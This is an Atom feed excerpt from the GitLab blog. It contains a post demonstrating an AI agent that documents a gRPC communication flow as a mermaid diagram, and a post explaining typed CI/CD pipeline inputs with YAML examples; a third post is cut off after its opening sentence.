<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <id>https://about.gitlab.com/blog</id>
    <title>GitLab</title>
    <updated>2025-07-08T01:12:02.034Z</updated>
    <generator>https://github.com/jpmonette/feed</generator>
    <author>
        <name>The GitLab Team</name>
    </author>
    <link rel="alternate" href="https://about.gitlab.com/blog"/>
    <link rel="self" href="https://about.gitlab.com/atom.xml"/>
    <subtitle>Gitlab Blog RSS feed</subtitle>
    <icon>https://about.gitlab.com/favicon.ico</icon>
    <rights>All rights reserved 2025,</rights>
    <entry>
        <title type="html"><![CDATA[Accelerate learning with GitLab Duo Agent Platform]]></title>
        <id>https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/</id>
        <link href="https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we continue to expand our AI capabilities so I often find myself learning and working in new codebases. Whether I'm debugging issues, implementing new features, or onboarding to different projects, understanding system architecture quickly is crucial. But let's be honest — manually tracing through complex communication flows, especially gRPC connections, can eat up hours of productive development time.</p>
<p>This is exactly the type of tedious, yet necessary, work <a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform</a> is designed to handle. Instead of replacing developers, it amplifies our capabilities by automating routine tasks so we can focus on creative problem solving and strategic technical work.</p>
<p>Let me show you how I used <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform</a> to generate comprehensive documentation for a Golang project's gRPC communication flow — and how it transformed hours of code analysis into a few minutes of guided interaction.</p>
<p>You can follow along with this video:</p>
<p>&lt;div style=&quot;padding:75% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1098569263?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;AI Agent Generates Complete gRPC Documentation in Minutes | GitLab Duo Agent Platform Demo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>The challenge: Understanding gRPC communication flows</h2>
<p>I was working with a project called &quot;Duo Workflow Executor&quot; that communicates with a gRPC server. Rather than spending my afternoon manually tracing through the codebase to understand the communication patterns, I decided to let Duo Agent Platform handle the heavy lifting.</p>
<p>My goal was simple: generate a clear diagram showing how the gRPC communication works, including what payloads are received, what actions are executed, and what responses are sent back.</p>
<p>Working in VS Code with the GitLab Workflow extension installed, I opened the project and crafted a specific prompt for Duo Agent Platform:</p>
<p>&quot;Can you prepare a mermaid diagram that shows the gRPC connection between duo-workflow-service and this project. It should show what this project receives in gRPC payload, and what actions it executes based on the payload, and what it sends back. Study internal/services/runner/runner.go, especially the Run method, and write the mermaid output to a grpc.md file.&quot;</p>
<p>Duo Agent Platform didn't just blindly execute my request — it began intelligently gathering context to create a comprehensive execution plan. The platform automatically:</p>
<ul>
<li>Searched through relevant Go files in the project</li>
<li>Read the specific file I mentioned (runner.go)</li>
<li>Identified additional files that would provide necessary context</li>
<li>Analyzed the codebase structure to understand the gRPC implementation</li>
</ul>
<p>This contextual awareness is what sets agentic AI tools with great context apart from simple code generation tools. Instead of working in isolation, Duo Agent Platform understands the relationships between different components of your project.</p>
<h2>Collaborative refinement</h2>
<p>Rather than making assumptions, Duo Agent Platform is designed to keep a human in the loop at critical moments in task execution to deliver better results. In this scenario, the platform paused to ask clarifying questions about the level of detail I wanted.</p>
<p><strong>Agent:</strong> &quot;Should I include error handling details in the diagram?&quot;</p>
<p><strong>Me:</strong> &quot;Don't focus on error handling. Include all actions. Focus on gRPC payload.&quot;</p>
<p>This back-and-forth refinement is crucial. The agent isn't just executing commands — it's working with me to ensure the deliverable meets my specific requirements.</p>
<h2>Execution and results</h2>
<p>With the clarified requirements, Duo Agent Platform finalized its execution plan and requested confirmation before proceeding. I could have modified the approach at this stage, but the plan was perfectly aligned with what I needed.</p>
<p>The agent then executed each task in sequence, providing real-time progress updates. Within minutes, it had:</p>
<ul>
<li>Analyzed all relevant files across the project</li>
<li>Created comprehensive documentation with a detailed mermaid diagram</li>
<li>Saved everything to the requested grpc.md file</li>
<li>Included valuable context about outgoing payloads and connection management</li>
</ul>
<p>The resulting documentation wasn't just a basic diagram — it was thorough, accurate, and immediately useful for understanding the system architecture.</p>
<h2>Reviewing the output</h2>
<p>Here's the actual mermaid diagram that Duo Agent Platform created, showing the complete gRPC communication flow:</p>
<pre><code class="language-mermaid">sequenceDiagram
participant DWS as duo-workflow-service
participant DWE as duo-workflow-executor
participant Runner as ExecutionRunner
participant ActionExecutor as Action Executor
participant FileSystem as File System/Commands


Note over DWS, DWE: gRPC Bidirectional Streaming (ExecuteWorkflow)

%% Connection Establishment
DWE-&gt;&gt;DWS: gRPC Connection with Headers
Note over DWE, DWS: Headers: authorization (Bearer token)&lt;br/&gt;x-gitlab-authentication-type: oidc&lt;br/&gt;x-gitlab-realm, x-gitlab-global-user-id&lt;br/&gt;x-gitlab-oauth-token, x-gitlab-base-url&lt;br/&gt;x-gitlab-instance-id, x-request-id&lt;br/&gt;x-gitlab-namespace-id, x-gitlab-project-id


%% Workflow Start Request
DWE-&gt;&gt;DWS: ClientEvent{StartWorkflowRequest}
Note over DWE, DWS: StartWorkflowRequest:&lt;br/&gt;- ClientVersion&lt;br/&gt;- WorkflowDefinition&lt;br/&gt;- Goal&lt;br/&gt;- WorkflowID&lt;br/&gt;- WorkflowMetadata&lt;br/&gt;- ClientCapabilities[]


%% Action Processing Loop
loop Action Processing
    DWS-&gt;&gt;DWE: Action Message
    Note over DWS, DWE: Action Types:&lt;br/&gt;- Action_RunCommand {program, flags[], arguments[]}&lt;br/&gt;- Action_RunGitCommand {command, arguments[], repositoryUrl}&lt;br/&gt;- Action_RunReadFile {filepath}&lt;br/&gt;- Action_RunWriteFile {filepath, contents}&lt;br/&gt;- Action_RunEditFile {filepath, oldString, newString}&lt;br/&gt;- Action_RunHTTPRequest {method, path, body}&lt;br/&gt;- Action_ListDirectory {directory}&lt;br/&gt;- Action_FindFiles {namePattern}&lt;br/&gt;- Action_Grep {searchDirectory, pattern, caseInsensitive}&lt;br/&gt;- Action_NewCheckpoint {}&lt;br/&gt;- Action_RunMCPTool {}


    DWE-&gt;&gt;Runner: Receive Action
    Runner-&gt;&gt;Runner: processWorkflowActions()
    Runner-&gt;&gt;ActionExecutor: executeAction(ctx, action)
    
    alt Action_RunCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Shell Command
        Note over ActionExecutor, FileSystem: Executes: program + flags + arguments&lt;br/&gt;in basePath directory
        FileSystem--&gt;&gt;ActionExecutor: Command Output + Exit Code
    
    else Action_RunReadFile
        ActionExecutor-&gt;&gt;FileSystem: Read File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Read file contents
        FileSystem--&gt;&gt;ActionExecutor: File Contents
    
    else Action_RunWriteFile
        ActionExecutor-&gt;&gt;FileSystem: Write File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Create/overwrite file
        FileSystem--&gt;&gt;ActionExecutor: Success/Error Message
    
    else Action_RunEditFile
        ActionExecutor-&gt;&gt;FileSystem: Edit File
        Note over ActionExecutor, FileSystem: Read → Replace oldString with newString → Write&lt;br/&gt;Check gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Edit Result Message
    
    else Action_RunGitCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Git Command 
        Note over ActionExecutor, FileSystem: Git operations with authentication&lt;br/&gt;Uses provided git config
        FileSystem--&gt;&gt;ActionExecutor: Git Command Output
    
    else Action_RunHTTPRequest
        ActionExecutor-&gt;&gt;DWS: HTTP Request to GitLab API
        Note over ActionExecutor, DWS: Method: GET/POST/PUT/DELETE&lt;br/&gt;Path: API endpoint&lt;br/&gt;Body: Request payload&lt;br/&gt;Headers: Authorization
        DWS--&gt;&gt;ActionExecutor: HTTP Response
    
    else Action_ListDirectory
        ActionExecutor-&gt;&gt;FileSystem: List Directory Contents
        Note over ActionExecutor, FileSystem: Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Directory Listing
    
    else Action_FindFiles
        ActionExecutor-&gt;&gt;FileSystem: Find Files by Pattern
        Note over ActionExecutor, FileSystem: Recursive search with name pattern&lt;br/&gt;Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: File Paths List
    
    else Action_Grep
        ActionExecutor-&gt;&gt;FileSystem: Search Text Pattern
        Note over ActionExecutor, FileSystem: Recursive text search&lt;br/&gt;Case sensitive/insensitive option
        FileSystem--&gt;&gt;ActionExecutor: Search Results
    
    else Action_NewCheckpoint/Action_RunMCPTool
        ActionExecutor-&gt;&gt;ActionExecutor: No-op Action
        Note over ActionExecutor: Returns empty success result
    end


    ActionExecutor--&gt;&gt;Runner: Action Result (string)
    
    alt Result Size Check
        Runner-&gt;&gt;Runner: Check if result &gt; 4MB
        Note over Runner: If result exceeds MaxMessageSize (4MB)&lt;br/&gt;Replace with error message about size limit
    end


    Runner-&gt;&gt;DWE: ActionResponse
    DWE-&gt;&gt;DWS: ClientEvent{ActionResponse}
    Note over DWE, DWS: ActionResponse:&lt;br/&gt;- RequestID (matches Action.RequestID)&lt;br/&gt;- Response (execution result string)
end


%% Workflow Completion
DWE-&gt;&gt;DWS: CloseSend()
Note over DWE, DWS: Signal end of workflow execution


%% Analytics and Cleanup
Runner-&gt;&gt;Runner: Send Analytics Event (Finish)
DWE-&gt;&gt;DWE: Token Revocation (if enabled)
DWE-&gt;&gt;DWS: Close gRPC Connection
</code></pre>
<p>This diagram reveals several important architectural insights that would have taken considerable time to extract manually:</p>
<ul>
<li><strong>Bidirectional communication:</strong> The workflow executor both initiates requests and responds to service actions.</li>
<li><strong>Rich payload structure:</strong> Each action type has specific parameters and expected responses.</li>
<li><strong>Multiple integration points:</strong> The executor interacts with local filesystem, Git repositories, and GitLab APIs.</li>
<li><strong>Comprehensive action set:</strong> Nine different action types handle everything from file operations to HTTP requests.</li>
<li><strong>Proper lifecycle management:</strong> Clear connection establishment and teardown patterns.</li>
</ul>
<p>What impressed me most was how the agent automatically included the detailed payload structures for each action type. This level of detail transforms the diagram from a high-level overview into actionable documentation that other developers can immediately use.</p>
<h2>Looking ahead</h2>
<p>This demonstration represents just one use case for GitLab Duo Agent Platform. The same contextual understanding and collaborative approach that made documentation generation seamless can be applied to:</p>
<ul>
<li><strong>Code reviews:</strong> Agents can analyze merge requests with full project context</li>
<li><strong>Testing:</strong> Generate comprehensive test suites based on actual usage patterns</li>
<li><strong>Debugging:</strong> Trace issues across multiple services and components</li>
<li><strong>Security scanning:</strong> Identify vulnerabilities with understanding of your specific architecture</li>
<li><strong>CI/CD optimization:</strong> Improve pipeline performance based on historical data</li>
</ul>
<p>GitLab Duo Agent Platform will enter public beta soon so <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">join the wait list today</a>.</p>
<p>Stay tuned to the <a href="https://about.gitlab.com/blog/">GitLab Blog</a> and social channels for additional updates. GitLab Duo Agent Platform is evolving rapidly with specialized agents, custom workflows, and community-driven extensions on the roadmap.</p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform: What’s next for intelligent DevSecOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
</ul>
]]></content>
        <author>
            <name>Halil Coban</name>
            <uri>https://about.gitlab.com/blog/authors/halil-coban</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[CI/CD inputs: Secure and preferred method to pass parameters to a pipeline]]></title>
        <id>https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/</id>
        <link href="https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab CI/CD inputs represent the future of pipeline parameter passing. As
a purpose-built feature designed specifically for typed parameters with
validation, clear contracts, and enhanced security, inputs solve the
fundamental challenges that teams have been working around with variables
for years.</p>
<p>While CI/CD variables have served as the traditional method for passing parameters to pipelines, they were originally designed for storing configuration settings — not as a sophisticated parameter-passing mechanism for complex workflows. This fundamental mismatch has created reliability issues, security concerns, and maintenance overhead that inputs elegantly eliminate.</p>
<p>This article demonstrates why CI/CD inputs should be your preferred approach for pipeline parameters. You'll discover how inputs provide type safety, prevent common pipeline failures, eliminate variable collision issues, and create more maintainable automation. You'll also see practical examples of inputs in action and how they solve real-world challenges, which we hope will encourage you to transition from variable-based workarounds to input-powered reliability.</p>
<h2>The hidden costs of variable-based parameter passing</h2>
<p>The problems with using variables for parameter passing are numerous and frustrating.</p>
<p><strong>No type validation</strong></p>
<p>Variables are strings. There is no type validation, meaning a pipeline expecting a boolean or a number, but accidentally receives a string. This leads to unexpected failures deep into the pipeline execution. In the case of a deployment workflow for example, hours after it was started  a critical production deployment fails because a boolean check in a variable was not passed as expected.</p>
<p><strong>Runtime mutability</strong></p>
<p>Variables can be modified throughout the pipeline runtime, creating unpredictable behavior when multiple jobs attempt to change the same values. For example, deploy_job_a sets <code>DEPLOY_ENV=staging</code>, but deploy_job_b changes the <code>DEPLOY_ENV</code> value to <code>production</code>.</p>
<p><strong>Security risks</strong></p>
<p>Security concerns arise because variables intended as simple parameters often receive the same access permissions as sensitive secrets. There's no clear contract defining what parameters a pipeline expects, their types, or their default values. A simple <code>BUILD_TYPE</code> parameter, that seems innocuous at first glance, suddenly has access to production secrets simply because variables do not inherently distinguish between parameters and sensitive data.</p>
<p>Perhaps most problematically, error detection happens too late in the process. A misconfigured variable might not cause a failure until minutes or even hours into a pipeline run, wasting valuable CI/CD resources and developer time. Teams have developed elaborate workarounds such as custom validation scripts, extensive documentation, and complex naming conventions just to make variable-based parameter passing somewhat reliable.</p>
<p>Many users have requested local debugging capabilities to test pipeline configurations before deployment. While this seems like an obvious solution, it quickly breaks down in practice. Enterprise CI/CD workflows integrate with dozens of external systems — cloud providers, artifact repositories, security scanners, deployment targets — that simply can't be replicated locally. Even if they could, the complexity would make local testing environments nearly impossible to maintain. This mismatch forced us to reframe the problem entirely. Instead of asking &quot;How can we test pipelines locally?&quot; we started asking &quot;How can we prevent configuration issues caused by variable-based parameter passing before users run a CI/CD automation workflow?&quot;</p>
<h2>Understanding variable precedence</h2>
<p>GitLab's variable system includes multiple <a href="https://docs.gitlab.com/ci/variables/#cicd-variable-precedence">precedence levels</a> to provide flexibility for different use cases. While this system serves many valid scenarios like allowing administrators to set instance- or group-wide defaults while letting individual projects override them when needed, it can create challenges when building reusable pipeline components.</p>
<p>When creating components or templates that will be used across different projects and groups, the variable precedence hierarchy can make behavior less predictable. For example, a template that works perfectly in one project might behave differently in another due to group- or instance-level variable overrides that aren't visible in a pipeline configuration.</p>
<p>When including multiple templates, it also can be challenging to track which variables are being set where and how they might interact.</p>
<p>In addition, components authors need to document not just what variables their template uses, but also potential conflicts with variables that might be defined at higher precedence levels.</p>
<h3>Variable precedence examples</h3>
<p><strong>Main pipeline file (<code>.gitlab-ci.yml</code>):</strong></p>
<pre><code class="language-yaml">
variables:

  ENVIRONMENT: production  # Top-level default for all jobs

  DATABASE_URL: prod-db.example.com

include:

  - local: 'templates/test-template.yml'

  - local: 'templates/deploy-template.yml'

</code></pre>
<p><strong>Test template (<code>templates/test-template.yml</code>):</strong></p>
<pre><code class="language-yaml">
run-tests:

  variables:

    ENVIRONMENT: test  # Job-level variable overrides the default

  script:

    - echo &quot;Running tests in $ENVIRONMENT environment&quot;  

    - echo &quot;Database URL is $DATABASE_URL&quot;  # Still inherits prod-db.example.com!

    - run-integration-tests --env=$ENVIRONMENT --db=$DATABASE_URL

    `# Issue: Tests run in &quot;test&quot; environment but against production database`

</code></pre>
<p><strong>Deploy template (<code>templates/deploy-template.yml</code>):</strong></p>
<pre><code class="language-yaml">
deploy-app:

  script:

    - echo &quot;Deploying to $ENVIRONMENT&quot;  # Uses production (top-level default)

    - echo &quot;Database URL is $DATABASE_URL&quot;  # Uses prod-db.example.com

    - deploy --target=$ENVIRONMENT --db=$DATABASE_URL

    # This will deploy to production as intended

</code></pre>
<p><strong>The challenges in this example:</strong></p>
<ol>
<li>
<p>Partial inheritance: The test job gets <code>ENVIRONMENT=test</code> but still inherits <code>DATABASE_URL=prod-db.example.com</code>.</p>
</li>
<li>
<p>Coordination complexity: Template authors must know what top-level variables exist and might conflict.</p>
</li>
<li>
<p>Override behavior: Job-level variables with the same name override defaults, but this isn't always obvious.</p>
</li>
<li>
<p>Hidden dependencies: Templates become dependent on the main pipeline's variable names.</p>
</li>
</ol>
<p>GitLab recognized these pain points and introduced <a href="https://docs.gitlab.com/ee/ci/inputs/">CI/CD inputs</a> as a purpose-built solution for passing parameters to pipelines, offering typed parameters with built-in validation that occurs at pipeline creation time rather than during execution.</p>
<h2>CI/CD inputs fundamentals</h2>
<p>Inputs provide typed parameters for reusable pipeline configuration with built-in validation at pipeline creation time, designed specifically for defining values when the pipeline runs. They create a clear contract between the pipeline consumer and the configuration, explicitly defining what parameters are expected, their types, and constraints.</p>
<h3>Configuration flexibility and scope</h3>
<p>One of the advantages of inputs is their configuration-time flexibility. Inputs are evaluated and interpolated during pipeline creation using the interpolation format <code>$[[ inputs.input-id ]]</code>, meaning they can be used anywhere in your pipeline configuration — including job names, rules conditions, images, and any other YAML configuration element. This eliminates the long-standing limitation of variable interpolation in certain contexts.</p>
<p>One common use case we've seen is that users define their job names like <code>test-$[[ inputs.environment ]]-deployment</code>.</p>
<p>When using inputs in job names, you can prevent naming conflicts when the same component is included multiple times in a single pipeline. Without this capability, including the same component twice would result in job name collisions, with the second inclusion overwriting the first. Input-based job names ensure each inclusion creates uniquely named jobs.</p>
<p><strong>Before inputs:</strong></p>
<pre><code class="language-yaml">
test-service:

  variables:

    SERVICE_NAME: auth-service

    ENVIRONMENT: staging

  script:

    - run-tests-for $SERVICE_NAME in $ENVIRONMENT

</code></pre>
<p><strong>With inputs:</strong></p>
<pre><code class="language-yaml">
spec:

  inputs:

    environment:

      type: string

    service_name:

      type: string

test-$[[ inputs.service_name ]]-$[[ inputs.environment ]]:

  script:

    - run-tests-for $[[ inputs.service_name ]] in $[[ inputs.environment ]]

</code></pre>
<p>When included multiple times with different inputs, this creates jobs like <code>test-auth-service-staging</code>, <code>test-payment-service-production</code>, and <code>test-notification-service-development</code>. Each job has a unique, meaningful name that clearly indicates its purpose, making pipeline visualization much clearer than having multiple jobs with identical names that would overwrite each other.</p>
<p>Now let's go back to the first example in the top of this blog and use inputs, one immediate benefit is that instead of maintaining multiple templates file we can use one reusable template with different input values:</p>
<pre><code class="language-yaml">
spec:

  inputs:

    environment:

      type: string

    database_url:

      type: string

    action:

      type: string

---


$[[ inputs.action ]]-$[[ inputs.environment ]]:

  script:

    - echo &quot;Running $[[ inputs.action ]] in $[[ inputs.environment ]] environment&quot;

    - echo &quot;Database URL is $[[ inputs.database_url ]]&quot;

    - run-$[[ inputs.action ]] --env=$[[ inputs.environment ]] --db=$[[ inputs.database_url ]]

</code></pre>
<p>And in the main <code>gitlab-ci.yml</code> file we can include it twice (or more) with different values, making sure we avoid naming collisions</p>
<pre><code class="language-yaml">
include:

  - local: 'templates/environment-template.yml'

    inputs:

      environment: test

      database_url: test-db.example.com

      action: tests

  - local: 'templates/environment-template.yml'

    inputs:

      environment: production

      database_url: prod-db.example.com

      action: deploy

</code></pre>
<p><strong>The result:</strong> Instead of maintaining separate YAML files for testing and deployment jobs, you now have a single reusable template that handles both use cases safely. This approach scales to any number of environments or job types — reducing maintenance overhead, eliminating code duplication, and ensuring consistency across your entire pipeline configuration. One template to maintain instead of many, with zero risk of variable collision or configuration drift.</p>
<h3>Validation and type safety</h3>
<p>Another key difference between variables and inputs lies in validation capabilities. Inputs support different value types, including strings, numbers, booleans, and arrays, with validation occurring immediately when the pipeline is created. If you define an input as a boolean but pass a string, GitLab will reject the pipeline before any jobs execute, saving time and resources.</p>
<p>Here is an example of the enormous benefit of type validation.</p>
<p><strong>Without type validation (variables):</strong></p>
<pre><code class="language-yaml">
variables:
  ENABLE_TESTS: &quot;true&quot;  # Always a string
  MAX_RETRIES: &quot;3&quot;      # Always a string

  
deploy_job:
  script:
    - if [ &quot;$ENABLE_TESTS&quot; = true ]; then  # This fails!
        echo &quot;Running tests&quot;
      fi
    - retry_count=$((MAX_RETRIES + 1))      # String concatenation: &quot;31&quot;

</code></pre>
<p><strong>Problem:</strong>  The boolean check fails because “<code>true</code>” (string) is not equal to <code>true</code>, (boolean).</p>
<p><strong>With type validation (inputs):</strong></p>
<pre><code class="language-yaml">
spec:
  inputs:
    enable_tests:
      type: boolean
      default: true
    max_retries:
      type: number
      default: 3

      
deploy_job:
  script:
    - if [ &quot;$[[ inputs.enable_tests ]]&quot; = true ]; then  # Works correctly
        echo &quot;Running tests&quot;
      fi
    - retry_count=$(($[[ inputs.max_retries ]] + 1))    # Math works: 4

</code></pre>
<p><strong>Real-world impact for variable type validation failure</strong>: A developer or a process triggers a GitLab CI/CD pipeline with <code>ENABLE_TESTS = yes</code> instead of <code>true</code>. Assuming it takes on average 30 minutes before the deployment job starts, then finally when this job kicks off, 30 minutes or longer into the pipeline run, the deployment script tries to evaluate the boolean and fails.</p>
<p>Imagine the impact in terms of time-to-market and, of course. developer time trying to debug why a seemingly basic deploy job failed.</p>
<p>With type inputs, GitLab CI/CD will immediately throw an error and provide an explicit error message regarding the type mismatch.</p>
<h3>Security and access control</h3>
<p>Inputs provide enhanced security through controlled parameter passing with explicit contracts that define exactly what values are expected and allowed, creating clear boundaries between parameter passing to the pipeline, In addition. inputs are immutable. Once the pipeline starts, they cannot be modified during execution, providing predictable behavior throughout the pipeline lifecycle and eliminating the security risks that come from runtime variable manipulation.</p>
<h3>Scope and lifecycle</h3>
<p>When you define variables using the <code>variables:</code> keyword at the top level of your <code>.gitlab-ci.yml</code> file, these variables become defaults for all jobs in your entire pipeline. When you include templates, you must consider what variables you've defined globally, as they can interact with the template's expected behavior through GitLab's variable precedence order.</p>
<p>Inputs are defined in CI configuration files (e.g. components or templates) and assigned values when a pipeline is triggered, allowing you to customize reusable CI configurations. They exist solely for pipeline creation and configuration time, scoped to the CI configuration file where they're defined, and become immutable references once the pipeline begins execution. Since each component maintains its own inputs, there is no risk of inputs interfering with other components or templates in your pipeline, eliminating variable collision and override issues that can occur with variable-based approaches.</p>
<h2>Working with variables and inputs together</h2>
<p>We recognize that teams have extensive investments in their variable-based workflows, and migration to inputs doesn't happen overnight. That's why we've developed capabilities that allow inputs and variables to work seamlessly together, providing a bridge between existing variables and the benefits of inputs while overcoming some key challenges in variable expansion.</p>
<p>Let's look at this real-world example.</p>
<p><strong>Variable expansion in rules conditions</strong></p>
<p>A common challenge occurs when using variables that contain other variable references in <code>rules:if</code> conditions. GitLab only expands variables one level deep during rule evaluation, which can lead to unexpected behavior:</p>
<pre><code class="language-yaml"># This doesn't work as expected

variables:
  TARGET_ENV:
    value: &quot;${CI_COMMIT_REF_SLUG}&quot;

deploy-job:
  rules:
    - if: '$TARGET_ENV == &quot;production&quot;'  # Compares &quot;${CI_COMMIT_REF_SLUG}&quot; != &quot;production&quot;
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
</code></pre>
<p>The <code>expand_vars</code> function solves this by forcing proper variable expansion in inputs:</p>
<pre><code class="language-yaml">spec:
  inputs:
    target_environment:
      description: &quot;Target deployment environment&quot;
      default: &quot;${CI_COMMIT_REF_SLUG}&quot;
---


deploy-job:
  rules:
    - if: '&quot;$[[ inputs.target_environment | expand_vars ]]&quot; == &quot;production&quot;'
      variables:
        DEPLOY_MODE: &quot;blue-green&quot;
        APPROVAL_REQUIRED: &quot;true&quot;
    - when: always
      variables:
        DEPLOY_MODE: &quot;rolling&quot;
        APPROVAL_REQUIRED: &quot;false&quot;
  script:
    - echo &quot;Target: $[[ inputs.target_environment | expand_vars ]]&quot;
    - echo &quot;Deploy mode: ${DEPLOY_MODE}&quot;
</code></pre>
<h3>Why this matters</h3>
<p>Without <code>expand_vars</code>, rule conditions evaluate against the literal variable reference (like <code>&quot;${CI_COMMIT_REF_SLUG}&quot;</code>) rather than the expanded value (like <code>&quot;production&quot;</code>). This leads to rules that never match when you expect them to, breaking conditional pipeline logic.</p>
<p><strong>Important notes about expand_vars:</strong></p>
<ul>
<li>
<p>Only variables that can be used with the include keyword are supported</p>
</li>
<li>
<p>Variables must be unmasked (not marked as protected/masked)</p>
</li>
<li>
<p>Nested variable expansion is not supported</p>
</li>
<li>
<p>Rule conditions using <code>expand_vars</code> must be properly quoted: <code>'&quot;$[[ inputs.name | expand_vars ]]&quot; == &quot;value&quot;'</code></p>
</li>
</ul>
<p>This pattern solves the single-level variable expansion limitation, working for any conditional logic that requires comparing fully resolved variable values.</p>
<h3>Function chaining for advanced processing</h3>
<p>Along with <code>expand_vars</code>, you can use functions like <code>truncate</code> to shorten values for compliance with naming restrictions (such as Kubernetes resource names), creating sophisticated parameter processing pipelines while maintaining input safety and predictability.</p>
<pre><code class="language-yaml">

spec:  

  inputs:

    service_identifier:

      default: 'service-$CI_PROJECT_NAME-$CI_COMMIT_REF_SLUG'

---


create-resource:

  script:

    - resource_name=$[[ inputs.service_identifier | expand_vars | truncate(0,50) ]]

</code></pre>
<p>This integration capability allows you to adopt inputs gradually while leveraging your existing variable infrastructure, making the migration path much smoother.</p>
<h3>From components only to CI pipelines</h3>
<p>Up until GitLab 17.11, GitLab users were able to use inputs only in components and templates through the <code>include:</code> syntax. This limited their use to reusable CI/CD configurations, but didn't address the broader need for dynamic pipeline customization.</p>
<h3>Pipeline-wide inputs support</h3>
<p>Starting with GitLab 17.11, GitLab users can now use inputs to safely modify pipeline behavior across all pipeline execution contexts, replacing the traditional reliance on pipeline variables. This expanded support includes:</p>
<ul>
<li>
<p>Scheduled pipelines: Define inputs with defaults for automated pipeline runs while allowing manual override when needed.</p>
</li>
<li>
<p>Downstream pipelines: Pass structured inputs to child and multi-project pipelines with proper validation and type safety.</p>
</li>
<li>
<p>Manual pipelines: Present users with a clean, validated form interface.</p>
</li>
</ul>
<p>Those enhancements, with more to follow, allow teams to modernize their pipelines while maintaining backward compatibility gradually. Once inputs are fully adopted, users can disable pipeline variables to ensures a more secure and predictable CI/CD environment.</p>
<h2>Summary</h2>
<p>The transition from variables to inputs represents more than just a technical upgrade — it's a shift toward more maintainable, predictable, and secure CI/CD pipelines. While variables continue to serve important purposes for configuration, inputs provide the parameter-passing capabilities that teams have been working around for years.</p>
<p>We understand that variables are deeply embedded in existing workflows, which is why we've built bridges between the two systems. The <code>expand_vars</code> function and other input capabilities allow you to adopt inputs gradually while leveraging your existing variable infrastructure.</p>
<p>By starting with new components and templates, then gradually migrating high-impact workflows, you'll quickly see the benefits of clearer contracts, earlier error detection, and more reliable automation that scales across your organization. Additionally, moving to inputs creates an excellent foundation for leveraging <a href="https://gitlab.com/explore/catalog">GitLab's CI/CD Catalog</a>, where reusable components with typed interfaces become powerful building blocks for your DevOps workflows but more on that in our next blog post.</p>
<p>Your future self and your teammates will thank you for the clarity and reliability that inputs bring to your CI/CD workflows, while still being able to work with the variable systems you've already invested in.</p>
<h2>What's next</h2>
<p>Looking ahead, we're expanding inputs to solve two key challenges: enhancing pipeline triggering with cascading options that <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/520094">dynamically adjust based on user selections</a>, and providing job-level inputs that allow users to <a href="https://gitlab.com/groups/gitlab-org/-/epics/17833">retry individual jobs with different parameter values</a>. We encourage you to follow these discussions, share your feedback, and contribute to shaping these features. You can also provide general feedback on CI/CD inputs through our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/407556">feedback issue</a>.</p>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/how-to-include-file-references-in-your-ci-cd-components/">How to include file references in your CI/CD components</a></li>
<li><a href="https://docs.gitlab.com/ci/inputs/">CI/CD inputs documentation</a></li>
<li><a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog goes GA: No more building pipelines from scratch</a></li>
<li><a href="https://about.gitlab.com/blog/demystifying-ci-cd-variables/">GitLab environment variables demystified</a></li>
</ul>
]]></content>
        <author>
            <name>Dov Hershkovitch</name>
            <uri>https://about.gitlab.com/blog/authors/dov-hershkovitch</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Fast and secure AI agent deployment to Google Cloud with GitLab]]></title>
        <id>https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><a href="https://about.gitlab.com/topics/agentic-ai/">Agentic AI</a> is transforming
how we build intelligent applications, but deploying AI agents securely and
